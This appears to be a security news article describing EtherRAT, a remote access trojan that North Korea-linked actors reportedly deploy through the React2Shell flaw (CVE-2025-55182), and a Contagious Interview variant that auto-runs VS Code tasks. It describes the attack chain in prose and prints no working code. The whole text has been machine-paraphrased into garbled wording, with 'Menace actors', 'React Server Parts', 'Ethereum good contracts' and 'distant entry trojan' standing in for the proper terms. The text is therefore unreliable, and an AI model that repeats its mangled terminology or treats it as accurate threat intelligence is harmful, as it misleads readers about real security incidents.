Menace actors with ties to North Korea have possible turn out to be the most recent to use the lately disclosed essential safety React2Shell flaw in React Server Parts (RSC) to ship a beforehand undocumented distant entry trojan dubbed EtherRAT.
“EtherRAT leverages Ethereum good contracts for command-and-control (C2) decision, deploys 5 unbiased Linux persistence mechanisms, and downloads its personal Node.js runtime from nodejs.org,” Sysdig mentioned in a report revealed Monday.
The cloud safety agency mentioned the exercise reveals important overlap with a long-running marketing campaign codenamed Contagious Interview, which has been noticed leveraging the EtherHiding method to distribute malware since February 2025.
Contagious Interview is the title given to a collection of assaults through which blockchain and Web3 builders, amongst others, are focused via pretend job interviews, coding assignments, and video assessments, resulting in the deployment of malware. These efforts usually start with a ruse that lures victims through platforms like LinkedIn, Upwork, or Fiverr, the place the menace actors pose as recruiters providing profitable job alternatives.
In keeping with software program provide chain safety firm Socket, it is one of the crucial prolific campaigns exploiting the npm ecosystem, highlighting their skill to adapt to JavaScript and cryptocurrency-centric workflows.
The assault chain commences with the exploitation of CVE-2025-55182 (CVSS rating: 10.0), a maximum-severity safety vulnerability in RSC, to execute a Base64-encoded shell command that downloads and runs a shell script liable for deploying the principle JavaScript implant.
The shell script is retrieved utilizing a curl command, with wget and python3 used as fallbacks. Additionally it is designed to organize the surroundings by downloading Node.js v20.10.0 from nodejs.org, following which it writes to disk an encrypted blob and an obfuscated JavaScript dropper. As soon as all these steps are full, it proceeds to delete the shell script to attenuate the forensic path and runs the dropper.
The first objective of the dropper is to decrypt the EtherRAT payload with a hard-coded key and spawn it utilizing the downloaded Node.js binary. The malware is notable for utilizing EtherHiding to fetch the C2 server URL from an Ethereum good contract each 5 minutes, permitting the operators to replace the URL simply, even when it is taken down.
“What makes this implementation distinctive is its use of consensus voting throughout 9 public Ethereum distant process name (RPC) endpoints,” Sysdig mentioned. “EtherRAT queries all 9 endpoints in parallel, collects responses, and selects the URL returned by the bulk.”
“This consensus mechanism protects in opposition to a number of assault situations: a single compromised RPC endpoint can not redirect bots to a sinkhole, and researchers can not poison C2 decision by working a rogue RPC node.”
It is value noting {that a} related implementation was beforehand noticed in two npm packages named colortoolsv2 and mimelib2 that have been discovered to ship downloader malware on developer techniques.
As soon as EtherRAT establishes contact with the C2 server, it enters a polling loop that executes each 500 milliseconds, decoding any response that is longer than 10 characters as JavaScript code to be run on the contaminated machine. Persistence is achieved through the use of 5 totally different strategies –
Systemd consumer service
XDG autostart entry
Cron jobs
.bashrc injection
Profile injection
By utilizing a number of mechanisms, the menace actors can make sure the malware runs even after a system reboot and grants them continued entry to the contaminated techniques. One other signal that factors to the malware’s sophistication is the self-update skill that overwrites itself with the brand new code acquired from the C2 server after sending its personal supply code to an API endpoint.
It then launches a brand new course of with the up to date payload. What’s notable right here is that the C2 returns a functionally similar however in a different way obfuscated model, thereby probably permitting it to bypass static signature-based detection.
Along with using EtherHiding, the hyperlinks to Contagious Interview stem from overlaps between the encrypted loader sample utilized in EtherRAT and a identified JavaScript info stealer and downloader named BeaverTail.
“EtherRAT represents a big evolution in React2Shell exploitation, shifting past opportunistic cryptomining and credential theft towards persistent, stealthy entry designed for long-term operations,” Sysdig mentioned.
“Whether or not this represents North Korean actors pivoting to new exploitation vectors or subtle method borrowing by one other actor, the outcome is identical: defenders face a difficult new implant that resists conventional detection and takedown strategies.”
Contagious Interview Shifts from npm to VS Code
The disclosure comes as OpenSourceMalware revealed particulars of a brand new Contagious Interview variant that urges victims to clone a malicious repository on GitHub, GitLab, or Bitbucket as a part of a programming task, and launch the mission in Microsoft Visible Studio Code (VS Code).
This leads to the execution of a VS Code duties.json file as a result of it being configured with runOptions.runOn: ‘folderOpen,’ inflicting it to auto-run as quickly because the mission is opened. The file is engineered to obtain a loader script utilizing curl or wget based mostly on the working system of the compromised host.
Within the case of Linux, the subsequent stage is a shell script that downloads and runs one other shell script named “vscode-bootstrap.sh,” which then fetches two extra information, “bundle.json” and “env-setup.js,” the latter of which serves as a launchpad for BeaverTail and InvisibleFerret.
OpenSourceMalware mentioned it recognized 13 totally different variations of this marketing campaign unfold throughout 27 totally different GitHub customers and 11 totally different variations of BeaverTail. The earliest repository (“github[.]com/MentarisHub121/TokenPresaleApp”) dates again to April 22, 2025, and the newest model (“github[.]com/eferos93/test4”) was created on December 1, 2025.
“DPRK menace actors have flocked to Vercel, and are actually utilizing it virtually solely,” the OpenSourceMalware crew mentioned. “We do not know why, however Contagious Interview has stopped utilizing Fly.io, Platform.sh, Render and different internet hosting suppliers.”
